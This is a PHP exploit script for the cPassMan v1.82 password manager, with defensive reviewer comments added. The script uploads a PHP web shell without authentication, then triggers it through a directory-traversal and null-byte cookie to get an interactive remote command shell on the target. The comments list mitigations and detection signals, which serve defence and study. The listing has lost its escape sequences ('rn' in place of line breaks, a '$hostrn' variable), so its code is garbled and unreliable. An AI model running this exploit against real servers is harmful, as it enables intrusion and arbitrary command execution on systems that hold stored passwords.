# Title : cPassMan v1.82 Remote Command Execution Exploit
# Published : 2012-02-25
# Author :
Product: Collaborative Passwords Manager (cPassMan)
Platform: Independent (PHP)
Affected versions: 1.82
<?php
/*
* cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)
* Disclaimer: cPassMan developer was notified of vulnerabilities in April 2011 and advised that v1.x was no longer supported.
* Note: Requires PHP 5.3.3 or lower due to the use of a poison null byte in the LFI.
*/
/*
* Reviewer notes (defensive reading of this listing):
* - Two weaknesses are chained: an upload handler under includes/libraries/uploadify/ that
*   accepts a file without authentication and stores it inside the document root (Stage One),
*   and a language-selection feature that builds an include path from the user_language
*   cookie, which allows directory traversal and null-byte truncation (Stage Two).
* - Mitigations implied by the two stages: require authentication and a server-side allow-list
*   on the upload handler, store uploads outside the web root, resolve the language strictly
*   against a fixed list instead of a cookie value, and run a PHP version that rejects null bytes
*   in file paths (the header note states this only works on PHP 5.3.3 or lower).
* - Detection signals visible in the traffic this script generates: a multipart POST to the
*   uploadify.php path, and a user_language cookie containing "../" and "%00".
* - Many string literals below end in a bare "n" or "rn"; this looks like the backslashes of
*   the escape sequences were lost when the listing was extracted, so the script as shown is
*   not byte-accurate.
*/
// Two positional arguments are required: target host and application path.
if ($argc < 3) {
print "Usage: php -f {$argv[0]} <host> <path> (e.g. php -f {$argv[0]} 192.168.129.130 /cpassman)n";
exit();
}
print "--------------------------------------------------------------------------------n";
print "cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)n";
print "--------------------------------------------------------------------------------n";
$host = $argv[1];
$path = $argv[2];
// Plain HTTP on port 80; there is no TLS handling anywhere in this script.
$port = 80;
/*
* Stage One: Unauthenticated Arbitrary File Upload
* Uploaded files are stored in the document root of the web server as a file with the MD5 hash of the original filename.
*/
print "[*] Stage One: Uploading command execution handler... ";
$upload_path = $path . "/includes/libraries/uploadify/uploadify.php";
// Raw socket request; a failed connect leaves $fp false and $result unset (see the strstr below).
$fp = fsockopen($host, $port, $errno, $errstr, 30);
if ($fp) {
fputs($fp, "POST $upload_path HTTP/1.1rn");
// NOTE(review): "$hostrn" is parsed by PHP as the variable $hostrn, not $host followed by "rn";
// another sign that the original escapes were lost in extraction.
fputs($fp, "Host: $hostrn");
fputs($fp, "Content-Type: multipart/form-data; boundary=---------------------------4827543632391rn");
// Fixed Content-Length for the literal multipart body sent below; not recomputed.
fputs($fp, "Content-Length: 233rnrn");
fputs($fp, "-----------------------------4827543632391rn");
// The handler reads the "Filedata" field; the server-side name is the MD5 of "rabbit.txt" (per the Stage One note).
fputs($fp, "Content-Disposition: form-data; name="Filedata"; filename="rabbit.txt";rn");
fputs($fp, "Content-Type: text/plainrnrn");
// The uploaded body is a PHP web shell; any upload handler that stores this unmodified in the web root is the core defect.
fputs($fp, "<?php echo system($_GET['z']); die(); ?>rn");
fputs($fp, "-----------------------------4827543632391--rnrn");
// Only the first 15 bytes of the status line are read, enough to see "200 OK".
$result = fgets($fp, 16);
fclose($fp);
}
// NOTE(review): $result is undefined when fsockopen failed above; this then emits a notice rather than reporting the failure.
if (strstr($result, "200 OK")) {
print "Success!n";
}
/*
* Stage Two: Local File Inclusion
* Several LFI vulnerabilities exist in the user language selection functionality. The exploit uses the user_language cookie attack vector.
*/
print "[*] Stage Two: Confirming command execution via local file inclusion... ";
// First command is a marker so the response body can be checked for "rabbit" before interactive mode starts.
$cmd = "echo rabbit";
$success = FALSE;
$stdin = fopen("php://stdin","r");
do {
// Spaces become "+" so the command survives as a single query-string value.
$cmd = str_replace(" ", "+", $cmd);
$lfi_path = $path . "/index.php?z=" . $cmd;
$fp = fsockopen($host, $port, $errno, $errstr, 30);
if ($fp) {
fputs($fp, "GET $lfi_path HTTP/1.1rn");
// NOTE(review): Host is the hard-coded example address from the usage text rather than $host.
fputs($fp, "Host: 192.168.129.130rn");
// Traversal plus null byte in the language cookie; the hex string is presumably md5('rabbit.txt') — not verified here.
// This cookie shape ("../" and "%00" in user_language) is the signature a WAF or log review should look for.
fputs($fp, "Cookie: user_language=../../../89f84a8775dd8f60cdbdef0d73919511%00rn");
fputs($fp, "Content-Length: 0rnrn");
// Assumes the response carries exactly 13 header lines before the body — TODO confirm; a different header count skews the output.
for ($i = 0; $i < 13; $i++) {
fgets($fp, 2048);
}
$output = "n";
// Read the remainder of the body until fgets fails or EOF is reached.
while (($tmp = fgets($fp, 2048)) != FALSE && !feof($fp)) {
$output .= $tmp;
}
// Output is only shown once the marker command has confirmed execution.
if ($success) {
echo $output;
}
fclose($fp);
}
// NOTE(review): $output is undefined here when the connect failed; strstr then operates on an unset variable.
if (!$success && strstr($output, "rabbit")) {
$success = TRUE;
print "Success!n";
}
print "n> ";
// Loop ends on an empty (or otherwise falsy, e.g. "0") trimmed stdin line.
} while ($cmd = trim(fgets($stdin)));
?>